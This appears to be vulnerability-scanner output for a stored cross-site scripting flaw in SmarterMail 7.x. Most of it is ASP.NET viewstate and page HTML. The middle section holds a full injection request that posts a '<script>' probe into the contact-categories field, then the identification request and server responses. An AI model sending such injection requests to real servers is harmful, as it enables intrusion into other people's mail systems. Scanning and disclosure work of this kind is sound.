bXkmbWFwcGVkPWZhbHNlBDIgUE0CMTQCMTQRUmlnaHRDbGlja2FibGVOZXcDQWx0ZAIID2QWAmYPFQcTQ2FsZW5kYXJCdXNpbmVzc0RheUovTWFpbi9DYWxlbmRhci9mcm1FdmVudC5hc3B4P2R0PTEwLzAyLzIwMTAmdGltZT0xNSZ1c2VyPWR1bW15Jm1hcHBlZD1mYWxzZQQzIFBNAjE1AjE1EVJpZ2h0Q2xpY2thYmxlTmV3AGQCCQ9kFgJmDxUHE0NhbGVuZGFyQnVzaW5lc3NEYXlKL01haW4vQ2FsZW5kYXIvZnJtRXZlbnQuYXNweD9kdD0xMC8wMi8yMDEwJnRpbWU9MTYmdXNlcj1kdW1teSZtYXBwZWQ9ZmFsc2UENCBQTQIxNgIxNhFSaWdodENsaWNrYWJsZU5ldwNBbHRkAgoPZBYCZg8VBxNDYWxlbmRhckJ1c2luZXNzRGF5Si9NYWluL0NhbGVuZGFyL2ZybUV2ZW50LmFzcHg/ZHQ9MTAvMDIvMjAxMCZ0aW1lPTE3JnVzZXI9ZHVtbXkmbWFwcGVkPWZhbHNlBDUgUE0CMTcCMTcRUmlnaHRDbGlja2FibGVOZXcAZAINDxQrAA0PFhwFDENsaWVudEV2ZW50cw8FhQFUZWxlcmlrLldlYi5VSS5DYWxlbmRhci5DYWxlbmRhckNsaWVudEV2ZW50cywgVGVsZXJpay5XZWIuVUksIFZlcnNpb249MjAxMC4yLjgxNy4zNSwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj0xMjFmYWU3ODE2NWJhM2Q0FggFAVIFDUNsZWFyQ2FsZW5kYXIFAVYFC1NlbGVjdE1vbnRoBQFDBQ1DbGVhckNhbGVuZGFyBQFKBQ1DbGVhckNhbGVuZGFyBRZGYXN0TmF2aWdhdGlvblByZXZUZXh0ZQUERm9jRAYAgBTk2y/NCAUWRmFzdE5hdmlnYXRpb25OZXh0VGV4dGUFA0VWU2cFG1VzZUNvbHVtbkhlYWRlcnNBc1NlbGVjdG9yc2gFBE1heEQGAIAHReg9MQkFEk5hdmlnYXRpb25OZXh0VGV4dGUFBE1pbkQGAIBMBLe1qggFDlJvd0hlYWRlckltYWdlBSkvQXBwX1RoZW1lcy9EZWZhdWx0L0ltYWdlcy9taXNjL3JpZ2h0LmdpZgUNU2VsZWN0ZWREYXRlcw8FjwFUZWxlcmlrLldlYi5VSS5DYWxlbmRhci5Db2xsZWN0aW9ucy5EYXRlVGltZUNvbGxlY3Rpb24sIFRlbGVyaWsuV2ViLlVJLCBWZXJzaW9uPTIwMTAuMi44MTcuMzUsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49MTIxZmFlNzgxNjViYTNkNBQrAAEGAIAU5NsvzUgFEk5hdmlnYXRpb25QcmV2VGV4dGUFEVZpZXdTZWxlY3RvckltYWdlBSovQXBwX1RoZW1lcy9EZWZhdWx0L0ltYWdlcy9taXNjL3JpZ2h0Mi5naWYFC1NwZWNpYWxEYXlzDwWSAVRlbGVyaWsuV2ViLlVJLkNhbGVuZGFyLkNvbGxlY3Rpb25zLkNhbGVuZGFyRGF5Q29sbGVjdGlvbiwgVGVsZXJpay5XZWIuVUksIFZlcnNpb249MjAxMC4yLjgxNy4zNSwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj0xMjFmYWU3ODE2NWJhM2Q0FCsAAA8WBh4EU2tpbgUMU21hcnRlclRvb2xzHhNFbmFibGVFbWJlZGRlZFNraW5zaB4XRW5hYmxlQWpheFNraW5SZW5kZXJpbmdoZGQWBB4IQ3NzQ2xhc3MFC3JjTWFpblRhYmxlHgRfIVNCAgIWBB8MBQxyY090aGVyTW9udGgfDQICZBYEHwwFCnJjU2VsZWN0ZWQfDQICZBYEHwwFCnJjRGlzYWJsZWQfDQICFgQfDAUMcmNPdXRPZlJhbmdlHw0CAhYEHwwFCXJjV2Vla2VuZB8NAgIWBB8MBQdyY0hvdmVyHw0CAhYEHwwFNlJhZENhbGVuZGFyTW9udGhWaWV3IFJhZENhbGVuZGFyTW9udGhWaWV3X1NtYXJ0ZXJUb29scx8NAgIWBB8MBQlyY1ZpZXdTZWwfDQICZAILD2QWAgIDD2QWAgIBD2QWAmYPZBYCAgEPDxYCHwVlZGQYBgUXY3RsMDAkVFBIJHRzVGFicyR0YWJBbGwPMs0LAAEAAAD/////AQAAAAAAAAAEAQAAAOIBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuRGljdGlvbmFyeWAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQQAAAAHVmVyc2lvbghDb21wYXJlcghIYXNoU2l6ZQ1LZXlWYWx1ZVBhaXJzAAMAAwiSAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkdlbmVyaWNFcXVhbGl0eUNvbXBhcmVyYDFbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dCOYBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuS2V5VmFsdWVQYWlyYDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dW10FAAAACQIAAAAHAAAACQMAAAAEAgAAAJIBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuR2VuZXJpY0VxdWFsaXR5Q29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0AAAAABwMAAAAAAQAAAAUAAAAD5AFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5LZXlWYWx1ZVBhaXJgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0E/P///+QBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuS2V5VmFsdWVQYWlyYDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dAgAAAANrZXkFdmFsdWUBAgYFAAAAB0VuYWJsZWQIAQEB+v////z///8GBwAAAARUZXh0CgH4/////P///wYJAAAAClJlc291cmNlSUQGCgAAAA5NRU5VX0FsbEV2ZW50cwH1/////P///wYMAAAACFNlbGVjdGVkCAEAAfP////8////Bg4AAAAKUGFnZVZpZXdJRAoLZAUaY3RsMDAkVFBIJHRzVGFicyR0YWJXZWVrbHkPMsYLAAEAAAD/////AQAAAAAAAAAEAQAAAOIBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuRGljdGlvbmFyeWAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQQAAAAHVmVyc2lvbghDb21wYXJlcghIYXNoU2l6ZQ1LZXlWYWx1ZVBhaXJzAAMAAwiSAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkdlbmVyaWNFcXVhbGl0eUNvbXBhcmVyYDFbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dCOYBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuS2V5VmFsdWVQYWlyYDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dW10FAAAACQIAAAAHAAAACQMAAAAEAgAAAJIBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuR2VuZXJpY0VxdWFsaXR5Q29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0AAAAABwMAAAAAAQAAAAUAAAAD5AFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5LZXlWYWx1ZVBhaXJgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0E/P///+QBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuS2V5VmFsdWVQYWlyYDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dAgAAAANrZXkFdmFsdWUBAgYFAAAAB0VuYWJsZWQIAQEB+v////z///8GBwAAAARUZXh0CgH4/////P///wYJAAAAClJlc291cmNlSUQGCgAAAAdAV2Vla2x5AfX////8////BgwAAAAIU2VsZWN0ZWQIAQAB8/////z///8GDgAAAApQYWdlVmlld0lECgtkBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WBQUUY3RsMDAkTVBIJGJ0bk5hdkxlZnQFFWN0bDAwJE1QSCRidG5OYXZSaWdodAUVY3RsMDAkTVBIJGJ0bkNhbFBvcHVwBRdjdGwwMCRNUEgkY2FsRGF0ZVBpY2tlcgUXY3RsMDAkTVBIJGNhbERhdGVQaWNrZXIFGWN0bDAwJFRQSCR0c1RhYnMkdGFiRGFpbHkPMsULAAEAAAD/////AQAAAAAAAAAEAQAAAOIBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuRGljdGlvbmFyeWAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQQAAAAHVmVyc2lvbghDb21wYXJlcghIYXNoU2l6ZQ1LZXlWYWx1ZVBhaXJzAAMAAwiSAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkdlbmVyaWNFcXVhbGl0eUNvbXBhcmVyYDFbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dCOYBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuS2V5VmFsdWVQYWlyYDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dW10FAAAACQIAAAAHAAAACQMAAAAEAgAAAJIBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuR2VuZXJpY0VxdWFsaXR5Q29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0AAAAABwMAAAAAAQAAAAUAAAAD5AFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5LZXlWYWx1ZVBhaXJgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0E/P///+QBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuS2V5VmFsdWVQYWlyYDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dAgAAAANrZXkFdmFsdWUBAgYFAAAAB0VuYWJsZWQIAQEB+v////z///8GBwAAAARUZXh0CgH4/////P///wYJAAAAClJlc291cmNlSUQGCgAAAAZARGFpbHkB9f////z///8GDAAAAAhTZWxlY3RlZAgBAAHz/////P///wYOAAAAClBhZ2VWaWV3SUQKC2QFG2N0bDAwJFRQSCR0c1RhYnMkdGFiTW9udGhseQ8yxwsAAQAAAP////8BAAAAAAAAAAQBAAAA4gFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5EaWN0aW9uYXJ5YDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBAAAAAdWZXJzaW9uCENvbXBhcmVyCEhhc2hTaXplDUtleVZhbHVlUGFpcnMAAwADCJIBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuR2VuZXJpY0VxdWFsaXR5Q29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0I5gFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5LZXlWYWx1ZVBhaXJgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV1bXQUAAAAJAgAAAAcAAAAJAwAAAAQCAAAAkgFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5HZW5lcmljRXF1YWxpdHlDb21wYXJlcmAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQAAAAAHAwAAAAABAAAABQAAAAPkAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLktleVZhbHVlUGFpcmAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQT8////5AFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5LZXlWYWx1ZVBhaXJgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0CAAAAA2tleQV2YWx1ZQECBgUAAAAHRW5hYmxlZAgBAQH6/////P///wYHAAAABFRleHQKAfj////8////BgkAAAAKUmVzb3VyY2VJRAYKAAAACEBNb250aGx5AfX////8////BgwAAAAIU2VsZWN0ZWQIAQAB8/////z///8GDgAAAApQYWdlVmlld0lECgtkBRxjdGwwMCRNUEgkY2FsQWxsJGdyZEFsbEFwcHRzDwUkVHJ1ZXxUcnVlfHxGYWxzZXxUcnVlfHxGYWxzZXxGYWxzZXwwZCnizOylDxOITDBiJNQ9q/9T738W" />
</div>

<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['aspnetForm'];
if (!theForm) {
theForm = document.aspnetForm;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>


<script src="/WebResource.axd?d=lFfe_wSSLYBiWo0hdQTqNA2&amp;t=633802452069218315" type="text/javascript"></script>


<script src="/ScriptResource.axd?d=PkU8JqZ1AqOnNUfS9wB-O8XFAfH3kdpAehi09BJok9KiMBXqeEWZLvdsdUFLbPxYAD0iIeAHZBtPh1mybNd0fzbzD1H1EGEbNX_3WW4l9J01&amp;t=ffffffffec2d9970" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=PkU8JqZ1AqOnNUfS9wB-O8XFAfH3kdpAehi09BJok9KiMBXqeEWZLvdsdUFLbPxYxlutgliktFrtyUOE-2vtH5p7RzBBFeKiwavJVGKo3xk1&amp;t=ffffffffec2d9970" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=TLc5eIFOuIYbyxvMGH2LFt43Y63-gGqTfdKbtXBAUWQcUaVolINSsSmd45xIt6vT0&amp;t=1a035eeb" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=TLc5eIFOuIYbyxvMGH2LFt43Y63-gGqTfdKbtXBAUWR9MeV9ZUBGsbQORxp8pY6I0fjnZzGUp1Vh7LOm8VmDBQ2&amp;t=1a035eeb" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=TLc5eIFOuIYbyxvMGH2LFt43Y63-gGqTfdKbtXBAUWTKY4fr_B9-s_P9kwjvZ5D1PWslctYv3SyMb4XUFYFVUAUmpHu3v1jth73Pi-k7Mak1&amp;t=1a035eeb" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=TLc5eIFOuIYbyxvMGH2LFt43Y63-gGqTfdKbtXBAUWTKY4fr_B9-s_P9kwjvZ5D1o6y_K2I5aF0r3HOKggytHw2&amp;t=1a035eeb" type="text/javascript"></script>
<script src="../Services/svcSuperHyperGrid.asmx/js" type="text/javascript"></script>

<script type="text/javascript">
self.EnableAnimations = false;
</script>

<script type="text/javascript" src="/App_Themes/Default/Javascript/JavaScript.ashx?guid=1CB60CF5B830100_1.6.3925.24513_&fileMask="></script>
<script type="text/javascript">
//<![CDATA[
Sys.WebForms.PageRequestManager._initialize('ctl00$ScriptManager1', document.getElementById('aspnetForm'));
Sys.WebForms.PageRequestManager.getInstance()._updateControls(['tctl00$TitleBar$UpdatePanel2','tctl00$BPH$ctl00','tctl00$UpdatePanel1','tctl00$TPH$UpdatePanel1','tctl00$MPH$ctl00','tctl00$CntPH$UpdatePanel3'], ['ctl00$TitleBar$menuCalendarSourceTitle','ctl00$TPH$lnkTabSelector','ctl00$BPH$btnDelete','ctl00$BPH$btnEdit','ctl00$MPH$rightClickMenu','ctl00$BrPH$searchBar$btnGo','ctl00$BrPH$searchBar$btnClear'], [], 90);
//]]>
</script>


<div id="ctl00_TitleBar_UpdatePanel2">

<div class="PageTitle" id="SectionHeader">
<div class="RoundedPageTitleLeft">

<!-- HyperMenu -->
<div class='hmNavMenu'><ul class='hmMenu hmNavMenu hmList' id='ctl00_TitleBar_menuCalendarSourceTitle' name='ctl00$Titl..
- /Main/frmContact.aspx

/Main/frmContact.aspx

http://vulnerable.smartermail.7.x.host:9998/Main/frmContact.aspx

Injection URL

http://vulnerable.smartermail.7.x.host:9998/Main/frmPopupContactCategories.aspx

Injection Request

POST /Main/frmPopupContactCategories.aspx HTTP/1.1
Referer: http://vulnerable.smartermail.7.x.host:9998/Main/frmPopupContactCategories.aspx
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; CloudScan Vulnerability Crawler http://cloudscan.me)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: vulnerable.smartermail.7.x.host:9998
Cookie: ASP.NET_SessionId=e25dkk45nuvkgrr4d1exuxrn
Content-Length: 443
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

__EVENTTARGET=ctl00%24BrPH%24OKImageButton&__EVENTARGUMENT=1&__VIEWSTATE=%2fwEPDwUKLTE1MzIwNjc1OQ8WBB4QX19fUmVzdWx0RmFpbHVyZWUeEF9fX1Jlc3VsdFN1Y2Nlc3NlFgJmD2QWAgIBD2QWBgIFDxYCHgdWaXNpYmxlaGQCBw9kFgJmD2QWAgIBDxYCHwJoFgICAQ8WAh4EVGV4dGVkAgsPZBYCAgMPZBYCZg9kFgJmDw8WBB4IQ3NzQ2xhc3MFDkluZGVudCBTZXR0aW5nHgRfIVNCAgJkFgICAw8PFgIfA2VkZGTYbBeYmpPfD5OfkuIOw4oB9USDxQ%3d%3d&ctl00%24MPH%24txtCategories_SettingText=%3cscript%3ens(0x005CD1)%3c%2fscript%3e

Identification Request

GET /Main/frmContact.aspx HTTP/1.1
Referer: http://vulnerable.smartermail.7.x.host:9998/Main/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; CloudScan Vulnerability Crawler http://cloudscan.me)
Cache-Control: no-cache
Host: vulnerable.smartermail.7.x.host:9998
Cookie: ASP.NET_SessionId=e25dkk45nuvkgrr4d1exuxrn
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Injection Response

HTTP/1.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Sun, 03 Oct 2010 09:12:07 GMT
X-AspNet-Version: 2.0.50727
Content-Encoding:
X-Compressed-By: HttpCompress
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 2563
Connection: Close


Identification Response

HTTP/1.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Sun, 03 Oct 2010 14:21:29 GMT
X-AspNet-Version: 2.0.50727
Content-Encoding:
X-Compressed-By: HttpCompress
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 12522
Connection: Close




<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
My Contacts - hoytllc.com - SmarterMail
</title><meta http-equiv="Page-Enter" content="blendTrans(Duration=0)" /><meta http-equiv="Page-Exit" content="blendTrans(Duration=0)" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&amp;fileMask=Main/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&amp;fileMask=Mail/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&amp;fileMask=Telerik&amp;rtl=false" rel="stylesheet" type="text/css" />
<!--[if lte IE 6]>
<style type="text/css">@import '/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=BrowserOverrides/ie6&rtl=false';</style>
<![endif]-->
<meta http-equiv="cache-control" content="no-cache"><meta http-equiv="pragma" content="no-cache"></head>
<body class="" dir="ltr">
<form method="post" action="frmContact.aspx" id="aspnetForm">
<div>
<input type="hidden" name="__LASTFOCUS" id="__LASTFOCUS" value="" />
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUJODY5NTM0MTk5DxYGHghfX19UaXRsZQULTXkgQ29udGFjdHMeEF9fX1Jlc3VsdEZhaWx1cmVlHhBfX19SZXN1bHRTdWNjZXNzZRYCZg9kFgICAQ9kFgoCAw9kFgQCAQ9kFgQCAw8PFgIeB1Zpc2libGVoZGQCBw8PFgIfA2hkZAIDD2QWAgIBDw8WAh4LTmF2aWdhdGVVUkwFHmZybUNvbnRhY3RzLmFzcHg/bWFwcGVkPSZ1c2VyPWRkAgQPFgQeBXN0eWxlBQ1kaXNwbGF5Om5vbmU7HwNoZAIGDxYCHwNoZAIHD2QWAmYPZBYCAgEPFgIfA2gWAgIBDxYCHgRUZXh0ZWQCCQ9kFgICAQ9kFgJmD2QWAgIBD2QWBGYPZBYGAgIPZBYCAgEPZBYIZg9kFgICAQ9kFgICAg8PFgIfBmRkZAIGDw8WAh8DaGRkAgcPZBYEZg8PFgIfBgUNRW1haWwgQWRkcmVzc2RkAgEPZBYCAgIPDxYCHwZkZGQCCg9kFgICAQ9kFgJmD2QWAmYPZBYCZg9kFgJmDw8WEB4cRW5hYmxlRW1iZWRkZWRCYXNlU3R5bGVzaGVldGgeE0VuYWJsZUVtYmVkZGVkU2tpbnNoHgRTa2luBQxTbWFydGVyVG9vbHMeB01heERhdGUGAABowSlcoQkeBF8hU0ICAh4MU2VsZWN0ZWREYXRlZB4IQ3NzQ2xhc3MFEkRhdGVQaWNrZXJPdmVycmlkZR4HTWluRGF0ZQYAQMr4o+jgB2QWBmYPFCsACA8WEh8IaB